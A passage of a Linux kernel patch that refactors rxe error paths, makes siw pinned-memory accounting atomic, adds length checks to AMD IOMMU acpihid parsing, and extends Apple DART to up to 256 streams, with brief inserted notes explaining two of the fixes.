++	return rxe_srq_from_attr(rxe, srq, attr, mask, &ucmd, udata);
+ }
+ 
+ static int rxe_query_srq(struct ib_srq *ibsrq, struct ib_srq_attr *attr)
+@@ -453,11 +442,11 @@ static int rxe_modify_qp(struct ib_qp *ibqp, struct ib_qp_attr *attr,
+ 
+ 	err = rxe_qp_chk_attr(rxe, qp, attr, mask);
+ 	if (err)
+-		goto err1;
++		return err;
+ 
+ 	err = rxe_qp_from_attr(qp, attr, mask, udata);
+ 	if (err)
+-		goto err1;
++		return err;
+ 
+ 	if ((mask & IB_QP_AV) && (attr->ah_attr.ah_flags & IB_AH_GRH))
+ 		qp->src_port = rdma_get_udp_sport(attr->ah_attr.grh.flow_label,
+@@ -465,9 +454,6 @@ static int rxe_modify_qp(struct ib_qp *ibqp, struct ib_qp_attr *attr,
+ 						  qp->attr.dest_qp_num);
+ 
+ 	return 0;
+-
+-err1:
+-	return err;
+ }
+ 
+ static int rxe_query_qp(struct ib_qp *ibqp, struct ib_qp_attr *attr,
+@@ -501,24 +487,21 @@ static int validate_send_wr(struct rxe_qp *qp, const struct ib_send_wr *ibwr,
+ 	struct rxe_sq *sq = &qp->sq;
+ 
+ 	if (unlikely(num_sge > sq->max_sge))
+-		goto err1;
++		return -EINVAL;
+ 
+ 	if (unlikely(mask & WR_ATOMIC_MASK)) {
+ 		if (length < 8)
+-			goto err1;
++			return -EINVAL;
+ 
+ 		if (atomic_wr(ibwr)->remote_addr & 0x7)
+-			goto err1;
++			return -EINVAL;
+ 	}
+ 
+ 	if (unlikely((ibwr->send_flags & IB_SEND_INLINE) &&
+ 		     (length > sq->max_inline)))
+-		goto err1;
++		return -EINVAL;
+ 
+ 	return 0;
+-
+-err1:
+-	return -EINVAL;
+ }
+ 
+ static void init_send_wr(struct rxe_qp *qp, struct rxe_send_wr *wr,
+@@ -639,17 +622,17 @@ static int post_one_send(struct rxe_qp *qp, const struct ib_send_wr *ibwr,
+ 
+ 	spin_lock_irqsave(&qp->sq.sq_lock, flags);
+ 
+-	full = queue_full(sq->queue, QUEUE_TYPE_TO_DRIVER);
++	full = queue_full(sq->queue, QUEUE_TYPE_FROM_ULP);
+ 
+ 	if (unlikely(full)) {
+ 		spin_unlock_irqrestore(&qp->sq.sq_lock, flags);
+ 		return -ENOMEM;
+ 	}
+ 
+-	send_wqe = queue_producer_addr(sq->queue, QUEUE_TYPE_TO_DRIVER);
++	send_wqe = queue_producer_addr(sq->queue, QUEUE_TYPE_FROM_ULP);
+ 	init_send_wqe(qp, ibwr, mask, length, send_wqe);
+ 
+-	queue_advance_producer(sq->queue, QUEUE_TYPE_TO_DRIVER);
++	queue_advance_producer(sq->queue, QUEUE_TYPE_FROM_ULP);
+ 
+ 	spin_unlock_irqrestore(&qp->sq.sq_lock, flags);
+ 
+@@ -735,14 +718,12 @@ static int rxe_post_recv(struct ib_qp *ibqp, const struct ib_recv_wr *wr,
+ 
+ 	if (unlikely((qp_state(qp) < IB_QPS_INIT) || !qp->valid)) {
+ 		*bad_wr = wr;
+-		err = -EINVAL;
+-		goto err1;
++		return -EINVAL;
+ 	}
+ 
+ 	if (unlikely(qp->srq)) {
+ 		*bad_wr = wr;
+-		err = -EINVAL;
+-		goto err1;
++		return -EINVAL;
+ 	}
+ 
+ 	spin_lock_irqsave(&rq->producer_lock, flags);
+@@ -761,7 +742,6 @@ static int rxe_post_recv(struct ib_qp *ibqp, const struct ib_recv_wr *wr,
+ 	if (qp->resp.state == QP_STATE_ERROR)
+ 		rxe_run_task(&qp->resp.task, 1);
+ 
+-err1:
+ 	return err;
+ }
+ 
+@@ -826,16 +806,9 @@ static int rxe_resize_cq(struct ib_cq *ibcq, int cqe, struct ib_udata *udata)
+ 
+ 	err = rxe_cq_chk_attr(rxe, cq, cqe, 0);
+ 	if (err)
+-		goto err1;
+-
+-	err = rxe_cq_resize_queue(cq, cqe, uresp, udata);
+-	if (err)
+-		goto err1;
+-
+-	return 0;
++		return err;
+ 
+-err1:
+-	return err;
++	return rxe_cq_resize_queue(cq, cqe, uresp, udata);
+ }
+ 
+ static int rxe_poll_cq(struct ib_cq *ibcq, int num_entries, struct ib_wc *wc)
+@@ -847,12 +820,12 @@ static int rxe_poll_cq(struct ib_cq *ibcq, int num_entries, struct ib_wc *wc)
+ 
+ 	spin_lock_irqsave(&cq->cq_lock, flags);
+ 	for (i = 0; i < num_entries; i++) {
+-		cqe = queue_head(cq->queue, QUEUE_TYPE_FROM_DRIVER);
++		cqe = queue_head(cq->queue, QUEUE_TYPE_TO_ULP);
+ 		if (!cqe)
+ 			break;
+ 
+ 		memcpy(wc++, &cqe->ibwc, sizeof(*wc));
+-		queue_advance_consumer(cq->queue, QUEUE_TYPE_FROM_DRIVER);
++		queue_advance_consumer(cq->queue, QUEUE_TYPE_TO_ULP);
+ 	}
+ 	spin_unlock_irqrestore(&cq->cq_lock, flags);
+ 
+@@ -864,7 +837,7 @@ static int rxe_peek_cq(struct ib_cq *ibcq, int wc_cnt)
+ 	struct rxe_cq *cq = to_rcq(ibcq);
+ 	int count;
+ 
+-	count = queue_count(cq->queue, QUEUE_TYPE_FROM_DRIVER);
++	count = queue_count(cq->queue, QUEUE_TYPE_TO_ULP);
+ 
+ 	return (count > wc_cnt) ? wc_cnt : count;
+ }
+@@ -880,7 +853,7 @@ static int rxe_req_notify_cq(struct ib_cq *ibcq, enum ib_cq_notify_flags flags)
+ 	if (cq->notify != IB_CQ_NEXT_COMP)
+ 		cq->notify = flags & IB_CQ_SOLICITED_MASK;
+ 
+-	empty = queue_empty(cq->queue, QUEUE_TYPE_FROM_DRIVER);
++	empty = queue_empty(cq->queue, QUEUE_TYPE_TO_ULP);
+ 
+ 	if ((flags & IB_CQ_REPORT_MISSED_EVENTS) && !empty)
+ 		ret = 1;
+@@ -921,26 +894,22 @@ static struct ib_mr *rxe_reg_user_mr(struct ib_pd *ibpd,
+ 	struct rxe_mr *mr;
+ 
+ 	mr = rxe_alloc(&rxe->mr_pool);
+-	if (!mr) {
+-		err = -ENOMEM;
+-		goto err2;
+-	}
+-
++	if (!mr)
++		return ERR_PTR(-ENOMEM);
+ 
+ 	rxe_get(pd);
+ 	mr->ibmr.pd = ibpd;
+ 
+ 	err = rxe_mr_init_user(rxe, start, length, iova, access, mr);
+ 	if (err)
+-		goto err3;
++		goto err1;
+ 
+ 	rxe_finalize(mr);
+ 
+ 	return &mr->ibmr;
+ 
+-err3:
++err1:
+ 	rxe_cleanup(mr);
+-err2:
+ 	return ERR_PTR(err);
+ }
+ 
+@@ -956,25 +925,22 @@ static struct ib_mr *rxe_alloc_mr(struct ib_pd *ibpd, enum ib_mr_type mr_type,
+ 		return ERR_PTR(-EINVAL);
+ 
+ 	mr = rxe_alloc(&rxe->mr_pool);
+-	if (!mr) {
+-		err = -ENOMEM;
+-		goto err1;
+-	}
++	if (!mr)
++		return ERR_PTR(-ENOMEM);
+ 
+ 	rxe_get(pd);
+ 	mr->ibmr.pd = ibpd;
+ 
+ 	err = rxe_mr_init_fast(max_num_sg, mr);
+ 	if (err)
+-		goto err2;
++		goto err1;
+ 
+ 	rxe_finalize(mr);
+ 
+ 	return &mr->ibmr;
+ 
+-err2:
+-	rxe_cleanup(mr);
+ err1:
++	rxe_cleanup(mr);
+ 	return ERR_PTR(err);
+ }
+ 
+diff --git a/drivers/infiniband/sw/siw/siw_mem.c b/drivers/infiniband/sw/siw/siw_mem.c
+index 61c17db70d658..bf69566e2eb63 100644
+--- a/drivers/infiniband/sw/siw/siw_mem.c
++++ b/drivers/infiniband/sw/siw/siw_mem.c
+@@ -398,7 +398,7 @@ struct siw_umem *siw_umem_get(u64 start, u64 len, bool writable)
+ 
+ 	mlock_limit = rlimit(RLIMIT_MEMLOCK) >> PAGE_SHIFT;
+ 
+-	if (num_pages + atomic64_read(&mm_s->pinned_vm) > mlock_limit) {
++	if (atomic64_add_return(num_pages, &mm_s->pinned_vm) > mlock_limit) {
+ 		rv = -ENOMEM;
+ 		goto out_sem_up;
+ 	}
+@@ -411,18 +411,16 @@ struct siw_umem *siw_umem_get(u64 start, u64 len, bool writable)
+ 		goto out_sem_up;
+ 	}
+ 	for (i = 0; num_pages; i++) {
+-		int got, nents = min_t(int, num_pages, PAGES_PER_CHUNK);
+-
+-		umem->page_chunk[i].plist =
++		int nents = min_t(int, num_pages, PAGES_PER_CHUNK);
++		struct page **plist =
+ 			kcalloc(nents, sizeof(struct page *), GFP_KERNEL);
+-		if (!umem->page_chunk[i].plist) {
++
++		if (!plist) {
+ 			rv = -ENOMEM;
+ 			goto out_sem_up;
+ 		}
+-		got = 0;
++		umem->page_chunk[i].plist = plist;
+ 		while (nents) {
+-			struct page **plist = &umem->page_chunk[i].plist[got];
+-
+ 			rv = pin_user_pages(first_page_va, nents,
+ 					    foll_flags | FOLL_LONGTERM,
+ 					    plist, NULL);
+@@ -430,12 +428,11 @@ struct siw_umem *siw_umem_get(u64 start, u64 len, bool writable)
+ 				goto out_sem_up;
+ 
+ 			umem->num_pages += rv;
+-			atomic64_add(rv, &mm_s->pinned_vm);
+ 			first_page_va += rv * PAGE_SIZE;
++			plist += rv;
+ 			nents -= rv;
+-			got += rv;
++			num_pages -= rv;
+ 		}
+-		num_pages -= got;
+ 	}
+ out_sem_up:
+ 	mmap_read_unlock(mm_s);
+@@ -443,6 +440,10 @@ out_sem_up:
+ 	if (rv > 0)
+ 		return umem;
+ 
++	/* Adjust accounting for pages not pinned */
++	if (num_pages)
++		atomic64_sub(num_pages, &mm_s->pinned_vm);
++
+ 	siw_umem_release(umem, false);
+ 
+ 	return ERR_PTR(rv);
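The siw accounting change appears to make the check and the charge one atomic step: atomic64_add_return() reserves the whole pin count up front, so two callers racing through a separate read-then-compare cannot both slip under RLIMIT_MEMLOCK, and the error path returns only the pages that were never actually pinned. The core pattern in compilable form, with invented names:

#include <stdatomic.h>

static _Atomic long pinned_vm;		/* stand-in for mm->pinned_vm */

static int charge_pages(long npages, long mlock_limit)
{
	/* reserve first: check and charge are a single atomic step */
	if (atomic_fetch_add(&pinned_vm, npages) + npages > mlock_limit) {
		atomic_fetch_sub(&pinned_vm, npages);	/* roll back */
		return -12;			/* -ENOMEM */
	}
	/* ... pin pages here; on partial failure, subtract the rest ... */
	return 0;
}

int main(void)
{
	return charge_pages(10, 8) == -12 ? 0 : 1;	/* over limit: rejected */
}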
+diff --git a/drivers/iommu/amd/init.c b/drivers/iommu/amd/init.c
+index 34029d1161073..7c14b1d32c8db 100644
+--- a/drivers/iommu/amd/init.c
++++ b/drivers/iommu/amd/init.c
+@@ -3475,15 +3475,26 @@ found:
+ 	return 1;
+ }
+ 
++#define ACPIID_LEN (ACPIHID_UID_LEN + ACPIHID_HID_LEN)
++
+ static int __init parse_ivrs_acpihid(char *str)
+ {
+ 	u32 seg = 0, bus, dev, fn;
+ 	char *hid, *uid, *p, *addr;
+-	char acpiid[ACPIHID_UID_LEN + ACPIHID_HID_LEN] = {0};
++	char acpiid[ACPIID_LEN] = {0};
+ 	int i;
+ 
+ 	addr = strchr(str, '@');
+ 	if (!addr) {
++		addr = strchr(str, '=');
++		if (!addr)
++			goto not_found;
++
++		++addr;
++
++		if (strlen(addr) > ACPIID_LEN)
++			goto not_found;
++
+ 		if (sscanf(str, "[%x:%x.%x]=%s", &bus, &dev, &fn, acpiid) == 4 ||
+ 		    sscanf(str, "[%x:%x:%x.%x]=%s", &seg, &bus, &dev, &fn, acpiid) == 5) {
+ 			pr_warn("ivrs_acpihid%s option format deprecated; use ivrs_acpihid=%s@%04x:%02x:%02x.%d instead\n",
+@@ -3496,6 +3507,9 @@ static int __init parse_ivrs_acpihid(char *str)
+ 	/* We have the '@', make it the terminator to get just the acpiid */
+ 	*addr++ = 0;
+ 
++	if (strlen(str) > ACPIID_LEN + 1)
++		goto not_found;
++
+ 	if (sscanf(str, "=%s", acpiid) != 1)
+ 		goto not_found;
+ 
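Both new strlen() guards exist because sscanf()'s %s conversion copies with no bound of its own: an over-long id on the kernel command line would overwrite the fixed acpiid[] buffer before the format string could object, so the length is rejected before scanning. A small sketch of the guard; the size and helper here are illustrative, not the kernel's:

#include <stdio.h>
#include <string.h>

#define ACPIID_LEN 32			/* illustrative buffer size */

static int parse_acpiid(const char *str, char acpiid[ACPIID_LEN])
{
	const char *addr = strchr(str, '=');

	if (!addr)
		return -1;
	++addr;
	/* reject before scanning: "%s" has no length limit of its own */
	if (strlen(addr) >= ACPIID_LEN)
		return -1;
	return sscanf(addr, "%s", acpiid) == 1 ? 0 : -1;
}

int main(void)
{
	char id[ACPIID_LEN];

	printf("%d\n", parse_acpiid("ivrs_acpihid=AMDI0020:0", id)); /* 0 */
	return 0;
}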
+diff --git a/drivers/iommu/amd/iommu.c b/drivers/iommu/amd/iommu.c
+index d3b39d0416fa3..968e5e6668b26 100644
+--- a/drivers/iommu/amd/iommu.c
++++ b/drivers/iommu/amd/iommu.c
+@@ -558,6 +558,15 @@ static void amd_iommu_report_page_fault(struct amd_iommu *iommu,
+ 		 * prevent logging it.
+ 		 */
+ 		if (IS_IOMMU_MEM_TRANSACTION(flags)) {
++			/* Device not attached to domain properly */
++			if (dev_data->domain == NULL) {
++				pr_err_ratelimited("Event logged [Device not attached to domain properly]\n");
++				pr_err_ratelimited("  device=%04x:%02x:%02x.%x domain=0x%04x\n",
++						   iommu->pci_seg->id, PCI_BUS_NUM(devid), PCI_SLOT(devid),
++						   PCI_FUNC(devid), domain_id);
++				goto out;
++			}
++
+ 			if (!report_iommu_fault(&dev_data->domain->domain,
+ 						&pdev->dev, address,
+ 						IS_WRITE_REQUEST(flags) ?
+@@ -2394,12 +2403,17 @@ static int amd_iommu_def_domain_type(struct device *dev)
+ 		return 0;
+ 
+ 	/*
+-	 * Do not identity map IOMMUv2 capable devices when memory encryption is
+-	 * active, because some of those devices (AMD GPUs) don't have the
+-	 * encryption bit in their DMA-mask and require remapping.
++	 * Do not identity map IOMMUv2 capable devices when:
++	 *  - memory encryption is active, because some of those devices
++	 *    (AMD GPUs) don't have the encryption bit in their DMA-mask
++	 *    and require remapping.
++	 *  - SNP is enabled, because it prohibits DTE[Mode]=0.
+ 	 */
+-	if (!cc_platform_has(CC_ATTR_MEM_ENCRYPT) && dev_data->iommu_v2)
++	if (dev_data->iommu_v2 &&
++	    !cc_platform_has(CC_ATTR_MEM_ENCRYPT) &&
++	    !amd_iommu_snp_en) {
+ 		return IOMMU_DOMAIN_IDENTITY;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/iommu/apple-dart.c b/drivers/iommu/apple-dart.c
+index 4f4a323be0d0f..06ca73bddb5a5 100644
+--- a/drivers/iommu/apple-dart.c
++++ b/drivers/iommu/apple-dart.c
+@@ -34,11 +34,10 @@
+ 
+ #include "dma-iommu.h"
+ 
+-#define DART_MAX_STREAMS 16
++#define DART_MAX_STREAMS 256
+ #define DART_MAX_TTBR 4
+ #define MAX_DARTS_PER_DEVICE 2
+ 
+-#define DART_STREAM_ALL 0xffff
+ 
+ #define DART_PARAMS1 0x00
+ #define DART_PARAMS_PAGE_SHIFT GENMASK(27, 24)
+@@ -85,6 +84,8 @@
+ struct apple_dart_hw {
+ 	u32 oas;
+ 	enum io_pgtable_fmt fmt;
++
++	int max_sid_count;
+ };
+ 
+ /*
+@@ -116,11 +117,15 @@ struct apple_dart {
+ 	spinlock_t lock;
+ 
+ 	u32 pgsize;
++	u32 num_streams;
+ 	u32 supports_bypass : 1;
+ 	u32 force_bypass : 1;
+ 
+ 	struct iommu_group *sid2group[DART_MAX_STREAMS];
+ 	struct iommu_device iommu;
++
++	u32 save_tcr[DART_MAX_STREAMS];
++	u32 save_ttbr[DART_MAX_STREAMS][DART_MAX_TTBR];
+ };
+ 
+ /*
+@@ -140,11 +145,11 @@ struct apple_dart {
+  */
+ struct apple_dart_stream_map {
+ 	struct apple_dart *dart;
+-	unsigned long sidmap;
++	DECLARE_BITMAP(sidmap, DART_MAX_STREAMS);
+ };
+ struct apple_dart_atomic_stream_map {
+ 	struct apple_dart *dart;
+-	atomic64_t sidmap;
++	atomic_long_t sidmap[BITS_TO_LONGS(DART_MAX_STREAMS)];
+ };
+ 
+ /*
+@@ -202,50 +207,55 @@ static struct apple_dart_domain *to_dart_domain(struct iommu_domain *dom)
+ static void
+ apple_dart_hw_enable_translation(struct apple_dart_stream_map *stream_map)
+ {
++	struct apple_dart *dart = stream_map->dart;
+ 	int sid;
+ 
+-	for_each_set_bit(sid, &stream_map->sidmap, DART_MAX_STREAMS)
++	for_each_set_bit(sid, stream_map->sidmap, dart->num_streams)
+ 		writel(DART_TCR_TRANSLATE_ENABLE,
+-		       stream_map->dart->regs + DART_TCR(sid));
++		       dart->regs + DART_TCR(sid));
+ }
+ 
+ static void apple_dart_hw_disable_dma(struct apple_dart_stream_map *stream_map)
+ {
++	struct apple_dart *dart = stream_map->dart;
+ 	int sid;
+ 
+-	for_each_set_bit(sid, &stream_map->sidmap, DART_MAX_STREAMS)
+-		writel(0, stream_map->dart->regs + DART_TCR(sid));
++	for_each_set_bit(sid, stream_map->sidmap, dart->num_streams)
++		writel(0, dart->regs + DART_TCR(sid));
+ }
+ 
+ static void
+ apple_dart_hw_enable_bypass(struct apple_dart_stream_map *stream_map)
+ {
++	struct apple_dart *dart = stream_map->dart;
+ 	int sid;
+ 
+ 	WARN_ON(!stream_map->dart->supports_bypass);
+-	for_each_set_bit(sid, &stream_map->sidmap, DART_MAX_STREAMS)
++	for_each_set_bit(sid, stream_map->sidmap, dart->num_streams)
+ 		writel(DART_TCR_BYPASS0_ENABLE | DART_TCR_BYPASS1_ENABLE,
+-		       stream_map->dart->regs + DART_TCR(sid));
++		       dart->regs + DART_TCR(sid));
+ }
+ 
+ static void apple_dart_hw_set_ttbr(struct apple_dart_stream_map *stream_map,
+ 				   u8 idx, phys_addr_t paddr)
+ {
++	struct apple_dart *dart = stream_map->dart;
+ 	int sid;
+ 
+ 	WARN_ON(paddr & ((1 << DART_TTBR_SHIFT) - 1));
+-	for_each_set_bit(sid, &stream_map->sidmap, DART_MAX_STREAMS)
++	for_each_set_bit(sid, stream_map->sidmap, dart->num_streams)
+ 		writel(DART_TTBR_VALID | (paddr >> DART_TTBR_SHIFT),
+-		       stream_map->dart->regs + DART_TTBR(sid, idx));
++		       dart->regs + DART_TTBR(sid, idx));
+ }
+ 
+ static void apple_dart_hw_clear_ttbr(struct apple_dart_stream_map *stream_map,
+ 				     u8 idx)
+ {
++	struct apple_dart *dart = stream_map->dart;
+ 	int sid;
+ 
+-	for_each_set_bit(sid, &stream_map->sidmap, DART_MAX_STREAMS)
+-		writel(0, stream_map->dart->regs + DART_TTBR(sid, idx));
++	for_each_set_bit(sid, stream_map->sidmap, dart->num_streams)
++		writel(0, dart->regs + DART_TTBR(sid, idx));
+ }
+ 
+ static void
+@@ -267,7 +277,7 @@ apple_dart_hw_stream_command(struct apple_dart_stream_map *stream_map,
+ 
+ 	spin_lock_irqsave(&stream_map->dart->lock, flags);
+ 
+-	writel(stream_map->sidmap, stream_map->dart->regs + DART_STREAM_SELECT);
++	writel(stream_map->sidmap[0], stream_map->dart->regs + DART_STREAM_SELECT);
+ 	writel(command, stream_map->dart->regs + DART_STREAM_COMMAND);
+ 
+ 	ret = readl_poll_timeout_atomic(
+@@ -280,7 +290,7 @@ apple_dart_hw_stream_command(struct apple_dart_stream_map *stream_map,
+ 	if (ret) {
+ 		dev_err(stream_map->dart->dev,
+ 			"busy bit did not clear after command %x for streams %lx\n",
+-			command, stream_map->sidmap);
++			command, stream_map->sidmap[0]);
+ 		return ret;
+ 	}
+ 
+@@ -298,6 +308,7 @@ static int apple_dart_hw_reset(struct apple_dart *dart)
+ {
+ 	u32 config;
+ 	struct apple_dart_stream_map stream_map;
++	int i;
+ 
+ 	config = readl(dart->regs + DART_CONFIG);
+ 	if (config & DART_CONFIG_LOCK) {
+@@ -307,12 +318,14 @@ static int apple_dart_hw_reset(struct apple_dart *dart)
+ 	}
+ 
+ 	stream_map.dart = dart;
+-	stream_map.sidmap = DART_STREAM_ALL;
++	bitmap_zero(stream_map.sidmap, DART_MAX_STREAMS);
++	bitmap_set(stream_map.sidmap, 0, dart->num_streams);
+ 	apple_dart_hw_disable_dma(&stream_map);
+ 	apple_dart_hw_clear_all_ttbrs(&stream_map);
+ 
+ 	/* enable all streams globally since TCR is used to control isolation */
+-	writel(DART_STREAM_ALL, dart->regs + DART_STREAMS_ENABLE);
++	for (i = 0; i < BITS_TO_U32(dart->num_streams); i++)
++		writel(U32_MAX, dart->regs + DART_STREAMS_ENABLE + 4 * i);
+ 
+ 	/* clear any pending errors before the interrupt is unmasked */
+ 	writel(readl(dart->regs + DART_ERROR), dart->regs + DART_ERROR);
+@@ -322,13 +335,16 @@ static int apple_dart_hw_reset(struct apple_dart *dart)
+ 
+ static void apple_dart_domain_flush_tlb(struct apple_dart_domain *domain)
+ {
+-	int i;
++	int i, j;
+ 	struct apple_dart_atomic_stream_map *domain_stream_map;
+ 	struct apple_dart_stream_map stream_map;
+ 
+ 	for_each_stream_map(i, domain, domain_stream_map) {
+ 		stream_map.dart = domain_stream_map->dart;
+-		stream_map.sidmap = atomic64_read(&domain_stream_map->sidmap);
++
++		for (j = 0; j < BITS_TO_LONGS(stream_map.dart->num_streams); j++)
++			stream_map.sidmap[j] = atomic_long_read(&domain_stream_map->sidmap[j]);
++
+ 		apple_dart_hw_invalidate_tlb(&stream_map);
+ 	}
+ }
+@@ -413,7 +429,7 @@ static int apple_dart_finalize_domain(struct iommu_domain *domain,
+ 	struct apple_dart *dart = cfg->stream_maps[0].dart;
+ 	struct io_pgtable_cfg pgtbl_cfg;
+ 	int ret = 0;
+-	int i;
++	int i, j;
+ 
+ 	mutex_lock(&dart_domain->init_lock);
+ 
+@@ -422,8 +438,9 @@ static int apple_dart_finalize_domain(struct iommu_domain *domain,
+ 
+ 	for (i = 0; i < MAX_DARTS_PER_DEVICE; ++i) {
+ 		dart_domain->stream_maps[i].dart = cfg->stream_maps[i].dart;
+-		atomic64_set(&dart_domain->stream_maps[i].sidmap,
+-			     cfg->stream_maps[i].sidmap);
++		for (j = 0; j < BITS_TO_LONGS(dart->num_streams); j++)
++			atomic_long_set(&dart_domain->stream_maps[i].sidmap[j],
++					cfg->stream_maps[i].sidmap[j]);
+ 	}
+ 
+ 	pgtbl_cfg = (struct io_pgtable_cfg){
+@@ -458,7 +475,7 @@ apple_dart_mod_streams(struct apple_dart_atomic_stream_map *domain_maps,
+ 		       struct apple_dart_stream_map *master_maps,
+ 		       bool add_streams)
+ {
+-	int i;
++	int i, j;
+ 
+ 	for (i = 0; i < MAX_DARTS_PER_DEVICE; ++i) {
+ 		if (domain_maps[i].dart != master_maps[i].dart)
+@@ -468,12 +485,14 @@ apple_dart_mod_streams(struct apple_dart_atomic_stream_map *domain_maps,
+ 	for (i = 0; i < MAX_DARTS_PER_DEVICE; ++i) {
+ 		if (!domain_maps[i].dart)
+ 			break;
+-		if (add_streams)
+-			atomic64_or(master_maps[i].sidmap,
+-				    &domain_maps[i].sidmap);
+-		else
+-			atomic64_and(~master_maps[i].sidmap,
+-				     &domain_maps[i].sidmap);
++		for (j = 0; j < BITS_TO_LONGS(domain_maps[i].dart->num_streams); j++) {
++			if (add_streams)
++				atomic_long_or(master_maps[i].sidmap[j],
++					       &domain_maps[i].sidmap[j]);
++			else
++				atomic_long_and(~master_maps[i].sidmap[j],
++						&domain_maps[i].sidmap[j]);
++		}
+ 	}
+ 
+ 	return 0;
+@@ -637,14 +656,14 @@ static int apple_dart_of_xlate(struct device *dev, struct of_phandle_args *args)
+ 
+ 	for (i = 0; i < MAX_DARTS_PER_DEVICE; ++i) {
+ 		if (cfg->stream_maps[i].dart == dart) {
+-			cfg->stream_maps[i].sidmap |= 1 << sid;
++			set_bit(sid, cfg->stream_maps[i].sidmap);
+ 			return 0;
+ 		}
+ 	}
+ 	for (i = 0; i < MAX_DARTS_PER_DEVICE; ++i) {
+ 		if (!cfg->stream_maps[i].dart) {
+ 			cfg->stream_maps[i].dart = dart;
+-			cfg->stream_maps[i].sidmap = 1 << sid;
++			set_bit(sid, cfg->stream_maps[i].sidmap);
+ 			return 0;
+ 		}
+ 	}
+@@ -663,13 +682,36 @@ static void apple_dart_release_group(void *iommu_data)
+ 	mutex_lock(&apple_dart_groups_lock);
+ 
+ 	for_each_stream_map(i, group_master_cfg, stream_map)
+-		for_each_set_bit(sid, &stream_map->sidmap, DART_MAX_STREAMS)
++		for_each_set_bit(sid, stream_map->sidmap, stream_map->dart->num_streams)
+ 			stream_map->dart->sid2group[sid] = NULL;
+ 
+ 	kfree(iommu_data);
+ 	mutex_unlock(&apple_dart_groups_lock);
+ }
+ 
++static int apple_dart_merge_master_cfg(struct apple_dart_master_cfg *dst,
++				       struct apple_dart_master_cfg *src)
++{
++	/*
++	 * We know that this function is only called for groups returned from
++	 * pci_device_group and that no Apple Silicon platform spreads PCIe
++	 * devices from the same bus across multiple DARTs, so we can assume
++	 * that both src and dst have the same single DART.
++	 */
++	if (src->stream_maps[1].dart)
++		return -EINVAL;
++	if (dst->stream_maps[1].dart)
++		return -EINVAL;
++	if (src->stream_maps[0].dart != dst->stream_maps[0].dart)
++		return -EINVAL;
++
++	bitmap_or(dst->stream_maps[0].sidmap,
++		  dst->stream_maps[0].sidmap,
++		  src->stream_maps[0].sidmap,
++		  dst->stream_maps[0].dart->num_streams);
++	return 0;
++}
++
+ static struct iommu_group *apple_dart_device_group(struct device *dev)
+ {
+ 	int i, sid;
+@@ -682,7 +724,7 @@ static struct iommu_group *apple_dart_device_group(struct device *dev)
+ 	mutex_lock(&apple_dart_groups_lock);
+ 
+ 	for_each_stream_map(i, cfg, stream_map) {
+-		for_each_set_bit(sid, &stream_map->sidmap, DART_MAX_STREAMS) {
++		for_each_set_bit(sid, stream_map->sidmap, stream_map->dart->num_streams) {
+ 			struct iommu_group *stream_group =
+ 				stream_map->dart->sid2group[sid];
+ 
+@@ -711,17 +753,31 @@ static struct iommu_group *apple_dart_device_group(struct device *dev)
+ 	if (!group)
+ 		goto out;
+ 
+-	group_master_cfg = kmemdup(cfg, sizeof(*group_master_cfg), GFP_KERNEL);
+-	if (!group_master_cfg) {
+-		iommu_group_put(group);
+-		goto out;
+-	}
++	group_master_cfg = iommu_group_get_iommudata(group);
++	if (group_master_cfg) {
++		int ret;
++
++		ret = apple_dart_merge_master_cfg(group_master_cfg, cfg);
++		if (ret) {
++			dev_err(dev, "Failed to merge DART IOMMU groups.\n");
++			iommu_group_put(group);
++			res = ERR_PTR(ret);
++			goto out;
++		}
++	} else {
++		group_master_cfg = kmemdup(cfg, sizeof(*group_master_cfg),
++					   GFP_KERNEL);
++		if (!group_master_cfg) {
++			iommu_group_put(group);
++			goto out;
++		}
+ 
+-	iommu_group_set_iommudata(group, group_master_cfg,
+-		apple_dart_release_group);
++		iommu_group_set_iommudata(group, group_master_cfg,
++			apple_dart_release_group);
++	}
+ 
+ 	for_each_stream_map(i, cfg, stream_map)
+-		for_each_set_bit(sid, &stream_map->sidmap, DART_MAX_STREAMS)
++		for_each_set_bit(sid, stream_map->sidmap, stream_map->dart->num_streams)
+ 			stream_map->dart->sid2group[sid] = group;
+ 
+ 	res = group;
+@@ -866,16 +922,26 @@ static int apple_dart_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = apple_dart_hw_reset(dart);
+-	if (ret)
+-		goto err_clk_disable;
+-
+ 	dart_params[0] = readl(dart->regs + DART_PARAMS1);
+ 	dart_params[1] = readl(dart->regs + DART_PARAMS2);
+ 	dart->pgsize = 1 << FIELD_GET(DART_PARAMS_PAGE_SHIFT, dart_params[0]);
+ 	dart->supports_bypass = dart_params[1] & DART_PARAMS_BYPASS_SUPPORT;
++
++	dart->num_streams = dart->hw->max_sid_count;
++
++	if (dart->num_streams > DART_MAX_STREAMS) {
++		dev_err(&pdev->dev, "Too many streams (%d > %d)\n",
++			dart->num_streams, DART_MAX_STREAMS);
++		ret = -EINVAL;
++		goto err_clk_disable;
++	}
++
+ 	dart->force_bypass = dart->pgsize > PAGE_SIZE;
+ 
++	ret = apple_dart_hw_reset(dart);
++	if (ret)
++		goto err_clk_disable;
++
+ 	ret = request_irq(dart->irq, apple_dart_irq, IRQF_SHARED,
+ 			  "apple-dart fault handler", dart);
+ 	if (ret)
+@@ -894,8 +960,8 @@ static int apple_dart_probe(struct platform_device *pdev)
+ 
+ 	dev_info(
+ 		&pdev->dev,
+-		"DART [pagesize %x, bypass support: %d, bypass forced: %d] initialized\n",
+-		dart->pgsize, dart->supports_bypass, dart->force_bypass);
++		"DART [pagesize %x, %d streams, bypass support: %d, bypass forced: %d] initialized\n",
++		dart->pgsize, dart->num_streams, dart->supports_bypass, dart->force_bypass);
+ 	return 0;
+ 
+ err_sysfs_remove:
+@@ -926,12 +992,53 @@ static int apple_dart_remove(struct platform_device *pdev)
+ static const struct apple_dart_hw apple_dart_hw_t8103 = {
+ 	.oas = 36,
+ 	.fmt = APPLE_DART,
++	.max_sid_count = 16,
+ };
+ static const struct apple_dart_hw apple_dart_hw_t6000 = {
+ 	.oas = 42,
+ 	.fmt = APPLE_DART2,
++	.max_sid_count = 16,
+ };
+ 
++static __maybe_unused int apple_dart_suspend(struct device *dev)
++{
++	struct apple_dart *dart = dev_get_drvdata(dev);
++	unsigned int sid, idx;
++
++	for (sid = 0; sid < dart->num_streams; sid++) {
++		dart->save_tcr[sid] = readl_relaxed(dart->regs + DART_TCR(sid));
++		for (idx = 0; idx < DART_MAX_TTBR; idx++)
++			dart->save_ttbr[sid][idx] =
++				readl(dart->regs + DART_TTBR(sid, idx));
++	}
++
++	return 0;
++}
++
